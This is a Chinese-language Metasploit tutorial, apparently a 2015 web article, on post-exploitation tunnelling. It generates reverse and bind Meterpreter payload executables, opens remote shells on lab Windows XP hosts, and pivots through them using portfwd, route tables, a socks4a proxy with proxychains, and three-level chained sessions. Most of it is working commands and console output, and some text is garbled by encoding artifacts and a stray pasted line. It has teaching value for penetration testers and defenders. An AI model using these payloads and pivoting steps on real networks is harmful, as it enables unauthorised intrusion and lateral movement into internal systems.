Metasploit滲透技巧:后滲透Meterpreter代理
責(zé)編:admin |2015-01-26 13:37:19前言
Metasploit是一個免費的、可下載的滲透測試框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊測試。它本身附帶數(shù)百個已知軟件漏洞的專業(yè)級漏洞攻擊測試工具。
當(dāng)H.D. Moore在2003年發(fā)布Metasploit時,計算機安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來測試那些未打過補丁或者剛剛打過補丁的漏洞。
正是因為Metasploit團隊一直都在努力開發(fā)各種攻擊測試工具,并將它們貢獻給所有Metasploit用戶,軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補丁了。
本文將科普下metasploit隧道代理的使用技巧。
0×00 獲取meterpreter
1.首先生成可執(zhí)行文件
root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.101.105 LPORT=444 X > meter.exe
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 281
Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"}
2.啟動msfconsole,監(jiān)聽反連端口
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console…/
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings — learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]
+ — –=[ 1386 exploits – 863 auxiliary – 236 post ]
+ — –=[ 342 payloads – 37 encoders – 8 nops ]
+ — –=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 444
LPORT => 444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 0.0.0.0 yes The listen address
LPORT 444 yes The listen port
Exploit target:
Id Name
– —-
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler…
3.在xp-test1執(zhí)行meter.exe,attacker獲得 meterperter
msf exploit(handler) > run
[*] Started reverse handler on 0.0.0.0:444
[*] Starting the payload handler…
[*] Sending stage (770048 bytes) to 192.168.101.107
[*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter – pencS
Hardware MAC : 00:0c:29:ed:cf:d0
MTU : 1500
IPv4 Address : 10.1.1.128
IPv4 Netmask : 255.255.255.0
0×01 meterpreter基本隧道代理
好,現(xiàn)在已經(jīng)有一個反彈回來的權(quán)限,下面介紹meterpreter隧道代理的幾種方法
1.portfwd
portfwd 是meterpreter提供的一種基本的端口轉(zhuǎn)發(fā)。porfwd可以反彈單個端口到本地,并且監(jiān)聽.使用方法如下:
meterpreter > portfwd
0 total local port forwards.
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional).
-h Help banner.
-l <opt> The local port to listen on.
-p <opt> The remote port to connect to.
-r <opt> The remote host to connect to.
使用實例介紹:
反彈10.1.1.129端口3389到本地2222并監(jiān)聽那么可以使用如下方法:
meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389
[*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389
meterpreter > portfwd
0: 0.0.0.0:2222 -> 10.1.1.129:3389
1 total local port forwards.
已經(jīng)轉(zhuǎn)發(fā)成功,下面來驗證下:
root@kali:~# netstat -an | grep "2222"
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN
可以看到已經(jīng)成功監(jiān)聽2222端口
接著連接本地2222端口即可連接受害機器10.1.1.129 3389端口,如下:
root@kali:~# rdesktop 127.1.1.0:2222
可以看到,已經(jīng)成功連接到10.1.1.129 的3389端口
2. pivot
pivot是meterpreter最常用的一種代理,可以輕松把你的機器代理到受害者內(nèi)網(wǎng)環(huán)境,下面介紹下pivot的搭建和使用方法
使用方法route add 目標i或ip段 Netmask 要使用代理的會話,通過實例來說明:
在metasploit添加一個路由表,目的是訪問10.1.1.129將通過meterpreter的會話 1 來訪問:
msf exploit(handler) > route add 10.1.1.129 255.255.255.255 1
[*] Route added
msf exploit(handler) > route print
Active Routing Table
====================
Subnet Netmask Gateway
—— ——- ——-
10.1.1.129 255.255.255.255 Session 1
這里如果要代理10.1.1.129/24 到session 1,則可以這么寫
route add 10.1.1.0 255.255.255.0 1
到這里pivot已經(jīng)配置好了,你在msf里對10.1.1.129進行掃描(db_nmap)或者訪問(psexe 模塊,ssh模塊等)將通過代理session 1這個會話來訪問。
如果想通過其他應(yīng)用程序來使用這個代理怎么辦呢,這時候可以借助 metasploit socks4a提供一個監(jiān)聽隧道供其他應(yīng)用程序訪問:
首先使用 socks4a并且配置,監(jiān)聽端口
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
—- ————— ——– ———–
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
Auxiliary action:
Name Description
—- ———–
Proxy
msf auxiliary(socks4a) > exploit -y
[*] Auxiliary module execution completed
msf auxiliary(socks4a) >
[*] Starting the socks4a proxy server
查看監(jiān)聽端口
root@kali:~# netstat -an | grep "1080"
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN
端口已經(jīng)監(jiān)聽,接著配置 proxychains
root@kali:~# vim /etc/proxychains.conf
[ProxyList]
# add proxy here …
# meanwileroot@kali:~# netstat -an | grep "1080"
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN
# defaults set to "tor"
socks4 127.0.0.1 1080
配置好以后看看使用 proxychains進行代理訪問,這里訪問10.1.1.129 3389端口
可以看到已經(jīng)成功訪問
0×02 多級代理
1. 二級代理隧道
上面介紹了meterpreter基礎(chǔ)的代理方法,但是有些實際環(huán)境不能直接使用,考慮如下環(huán)境(內(nèi)網(wǎng)機器A、B。A機器可以對外連接,但是訪問控制很嚴格,只能訪問到很少的內(nèi)網(wǎng)機器,B機器不能對外連接,但是可以訪問到很多核心服務(wù)和機器,A、B之間可以互相訪問),如果我們想通過B機器對核心服務(wù)和機器進行掃描和訪問要怎么辦呢?
這時候我們就meterpreter的pivot組合輕松實現(xiàn)二級代理就可以
效果示意圖:attacker->xp-test1->xp-test2
首先接著上面,我們已經(jīng)有一個xp-test1反彈回來的meterprter了,接著我們生成一個正向的執(zhí)行文件
root@kali:~# msfpayload windows/meterpreter/bind_tcp RHOST=0.0.0.0 RPORT=4444 X > Rmeter.exe
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 285
Options: {"RHOST"=>"0.0.0.0", "RPORT"=>"4444"}
生成好以后在xp-test2上面運行
接著在msf里面添加路由
msf exploit(handler) > route add 10.1.1.129 255.255.255.255 2
[*] Route added
msf exploit(handler) > route print
Active Routing Table
====================
Subnet Netmask Gateway
—— ——- ——-
10.1.1.129 255.255.255.255 Session 2
連接正向 meterpreter獲取權(quán)限
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows//bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 10.1.1.129
RHOST => 10.1.1.129
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LPORT 444 yes The listen port
RHOST 10.1.1.129 no The target address
Exploit target:
Id Name
– —-
0 Wildcard Target
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.1.1.129 no The target address
Exploit target:
Id Name
– —-
0 Wildcard Target
msf exploit(handler) > run
[*] Started bind handler
[*] Starting the payload handler…
[*] Sending stage (770048 bytes)
[*] Meterpreter session 3 opened (192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444) at 2015-01-11 13:34:37 +0800
現(xiàn)在已經(jīng)獲取到xp-test2的權(quán)限,注意這里是通過xp-test1 pivot代理
下面來驗證下,查看xp-test2 4444端口
C:Documents and SettingsAdministrator>netstat -an | find "4444"
TCP 10.1.1.129:4444 10.1.1.128:1051 ESTABLISHED
是通過xp-test1進行連接的。
這時候二級代理已經(jīng)搭建好了,你可以添加需要訪問的ip到路由表,通過第二層的session(session 3),就可以使用metaploit的其他模塊訪問或掃描了
2.三級或多級代理
有時候過于龐大或者復(fù)雜的內(nèi)網(wǎng)環(huán)境,甚至需要三層或者多層代理,原理與兩層相似,通過在第二層代理的基礎(chǔ)上進行連接既可
示意圖:attacket->xp-test1->xp-test2->xp-test3->…..
與兩層代理類似,如下實現(xiàn):
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
– —- ———– ———-
2 meterpreter x86/win32 XP-TEST1Administrator @ XP-TEST1 192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)
4 meterpreter x86/win32 XP-TEST2Administrator @ XP-TEST2 192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)
msf exploit(handler) > route add 10.1.1.131 4
[-] Missing arguments to route add.
msf exploit(handler) > route add 10.1.1.131 255.255.255.255 4
[*] Route added
msf exploit(handler) > route print
Active Routing Table
====================
Subnet Netmask Gateway
—— ——- ——-
10.1.1.129 255.255.255.255 Session 2
10.1.1.131 255.255.255.255 Session 4
msf exploit(handler) > set RHOST=10.1.1.131
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module';s
datastore. Use -g to operate on the global datastore
msf exploit(handler) > set RHOST 10.1.1.131
RHOST => 10.1.1.131
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 10.1.1.131 no The target address
Exploit target:
Id Name
– —-
0 Wildcard Target
msf exploit(handler) > run
[*] Started bind handler
[*] Starting the payload handler…
[*] Sending stage (770048 bytes)
[*] Meterpreter session 5 opened (192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444) at 2015-01-11 13:45:53 +0800
meterpreter > background
[*] Backgrounding session 5…
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
– —- ———– ———-
2 meterpreter x86/win32 XP-TEST1Administrator @ XP-TEST1 192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)
4 meterpreter x86/win32 XP-TEST2Administrator @ XP-TEST2 192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)
5 meterpreter x86/win32 XP-TEST3Administrator @ XP-TEST3 192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444 (10.1.1.131)
在xp-test3查看端口連接
C:Documents and SettingsAdministrator>netstat -an | find "4444"
TCP 10.1.1.131:4444 10.1.1.129:1032 ESTABLISHED
在xp-test2查看4444端口
C:Documents and SettingsAdministrator>netstat -an | find "4444"
TCP 10.1.1.129:1032 10.1.1.131:4444 ESTABLISHED
TCP 10.1.1.129:4444 10.1.1.128:1054 ESTABLISHED
說明已經(jīng)實現(xiàn)三級連接,即attacker->xp-test1->xp-test2->xp-test3
0×03 總結(jié)
最后,代理級數(shù)越多,帶寬損耗和穩(wěn)定性就會下降。滲透過程中根據(jù)實際情況自由靈活的選擇和使用代理方式才能實現(xiàn)事半工倍的效果。
下一篇:GRE配置
- ISC.AI 2025正式啟動:AI與安全協(xié)同進化,開啟數(shù)智未來
- 360安全云聯(lián)運商座談會圓滿落幕 數(shù)十家企業(yè)獲“聯(lián)營聯(lián)運”認證!
- 280萬人健康數(shù)據(jù)被盜,兩家大型醫(yī)療集團賠償超4700萬元
- 推動數(shù)據(jù)要素安全流通的機制與技術(shù)
- RSAC 2025前瞻:Agentic AI將成為行業(yè)新風(fēng)向
- 因被黑致使個人信息泄露,企業(yè)賠償員工超5000萬元
- UTG-Q-017:“短平快”體系下的高級竊密組織
- 算力并網(wǎng)可信交易技術(shù)與應(yīng)用白皮書
- 美國美中委員會發(fā)布DeepSeek調(diào)查報告
- 2024年中國網(wǎng)絡(luò)與信息法治建設(shè)回顧